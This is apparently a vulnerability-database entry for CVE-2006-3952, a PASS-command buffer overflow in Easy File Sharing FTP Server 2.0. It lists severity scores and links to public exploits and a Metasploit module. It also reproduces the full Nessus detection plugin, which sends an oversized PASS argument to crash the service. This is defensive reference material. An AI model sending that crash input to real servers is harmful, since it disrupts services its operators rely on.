Vulnerabilities > CVE-2006-3952 - Remote Buffer Overflow vulnerability in EFS Software EFS FTP Server 2.0

CVSS 7.5 - HIGH

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

efs-software

nessus

exploit available

metasploit

NVD

Published: 2006-08-01

Updated: 2017-07-20

Summary

Stack-based buffer overflow in EFS Software Easy File Sharing FTP Server 2.0 allows remote attackers to execute arbitrary code via a long argument to the PASS command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.

Vulnerable Configurations

Part	Description	Count
Application	Efs_Software EFS Software EFS FTP Server 2.0	1

Exploit-Db

description	Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4). CVE-2006-3952. Remote exploit for windows platform
id	EDB-ID:3579
last seen	2016-01-31
modified	2007-03-26
published	2007-03-26
reporter	Winny Thomas
source	https://www.exploit-db.com/download/3579/
title	Easy File Sharing FTP Server 2.0 PASS Remote Exploit Win2K SP4

description	Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow. CVE-2006-3952. Remote exploit for windows platform
id	EDB-ID:33538
last seen	2016-02-03
modified	2014-05-27
published	2014-05-27
reporter	superkojiman
source	https://www.exploit-db.com/download/33538/
title	Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow

description	Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC). CVE-2006-3952. Remote exploit for windows platform
id	EDB-ID:2234
last seen	2016-01-31
modified	2006-08-21
published	2006-08-21
reporter	h07
source	https://www.exploit-db.com/download/2234/
title	Easy File Sharing FTP Server 2.0 PASS Remote Exploit PoC

description	Easy File Sharing FTP Server 2.0 PASS Overflow. CVE-2006-3952. Remote exploit for windows platform
id	EDB-ID:16742
last seen	2016-02-02
modified	2010-05-09
published	2010-05-09
reporter	metasploit
source	https://www.exploit-db.com/download/16742/
title	Easy File Sharing FTP Server 2.0 PASS Overflow

Metasploit

description	This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.
id	MSF:EXPLOIT/WINDOWS/FTP/EASYFILESHARING_PASS
last seen	2020-01-25
modified	2017-07-24
published	2007-03-26
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3952
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/easyfilesharing_pass.rb
title	Easy File Sharing FTP Server 2.0 PASS Overflow

Nessus

NASL family	FTP
NASL id	EFS_FTP_SERVER_PASS_OVERFLOW.NASL
description	The remote host appears to be using Easy File Sharing FTP Server, an FTP server for Windows. The version of Easy File Sharing FTP Server installed on the remote host contains a stack-based buffer overflow vulnerability that can be exploited by an unauthenticated attacker with a specially crafted PASS command to crash the affected application or execute arbitrary code on the affected host.
last seen	2020-06-01
modified	2020-06-02
plugin id	24021
published	2007-01-17
reporter	This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/24021
title	Easy File Sharing FTP Server PASS Command Overflow
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(24021); script_version("1.19"); script_cvs_date("Date: 2018/07/10 14:27:33"); script_cve_id("CVE-2006-3952"); script_bugtraq_id(19243); script_xref(name:"EDB-ID", value:"2234"); script_xref(name:"EDB-ID", value:"33538"); script_name(english:"Easy File Sharing FTP Server PASS Command Overflow"); script_summary(english:"Checks for PASS command buffer overflow vulnerability in EFS FTP Server"); script_set_attribute(attribute:"synopsis", value:"The remote FTP server is affected by a buffer overflow vulnerability."); script_set_attribute(attribute:"description", value: "The remote host appears to be using Easy File Sharing FTP Server, an FTP server for Windows. The version of Easy File Sharing FTP Server installed on the remote host contains a stack-based buffer overflow vulnerability that can be exploited by an unauthenticated attacker with a specially crafted PASS command to crash the affected application or execute arbitrary code on the affected host."); script_set_attribute(attribute:"solution", value:"Unknown at this time."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Easy File Sharing FTP Server 2.0 PASS Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2006/07/31"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/17"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"FTP"); script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc."); script_dependencies("ftpserver_detect_type_nd_version.nasl"); script_exclude_keys("global_settings/supplied_logins_only"); script_require_ports("Services/ftp", 21); exit(0); } include("audit.inc"); include("global_settings.inc"); include("ftp_func.inc"); include("misc_func.inc"); if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY); port = get_ftp_port(default: 21); # Make sure the banner indicates it's WFTPD. banner = get_ftp_banner(port:port); if (!banner \|\| "Easy File Sharing FTP Server" >!< banner) exit(0, "The FTP server on port "+port+" is not Easy File Sharing."); soc = open_sock_tcp(port); if (!soc) exit(1, "Cannot connect to TCP port "+port+"."); s = ftp_recv_line(socket:soc); # Try to exploit the flaw to crash the daemon. user = get_kb_item("ftp/login"); if (!user) user = "anonymous"; c = strcat("USER ", user); send(socket:soc, data: c+'\r\n'); s = ftp_recv_line(socket:soc); if (s && '331 username ok, need password.' >< s) { exploit = strcat(",", crap(2571)); c = strcat("PASS ", exploit); send(socket:soc, data: c+'\r\n'); s = ftp_recv_line(socket:soc); close(soc); if (s) exit(0); # Check whether the server is down. if (service_is_dead(port: port, exit: 1) > 0) security_hole(port); }

Packetstorm

data source	https://packetstormsecurity.com/files/download/83010/easyfilesharing_pass.rb.txt
id	PACKETSTORM:83010
last seen	2016-12-05
published	2009-11-26
reporter	MC
source	https://packetstormsecurity.com/files/83010/Easy-File-Sharing-FTP-Server-2.0-PASS-Overflow.html
title	Easy File Sharing FTP Server 2.0 PASS Overflow

data source	https://packetstormsecurity.com/files/download/126845/easysharingftp-overflow.txt
id	PACKETSTORM:126845
last seen	2016-12-05
published	2014-05-30
reporter	superkojiman
source	https://packetstormsecurity.com/files/126845/Easy-File-Sharing-FTP-Server-3.5-Buffer-Overflow.html
title	Easy File Sharing FTP Server 3.5 Buffer Overflow

Seebug

bulletinFamily	exploit
description	No description provided by source.
id	SSV:86747
last seen	2017-11-19
modified	2014-07-01
published	2014-07-01
reporter	Root
source	https://www.seebug.org/vuldb/ssvid-86747
title	Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow

Summary

Vulnerable Configurations

Exploit-Db

Metasploit

Nessus

Packetstorm

Seebug

References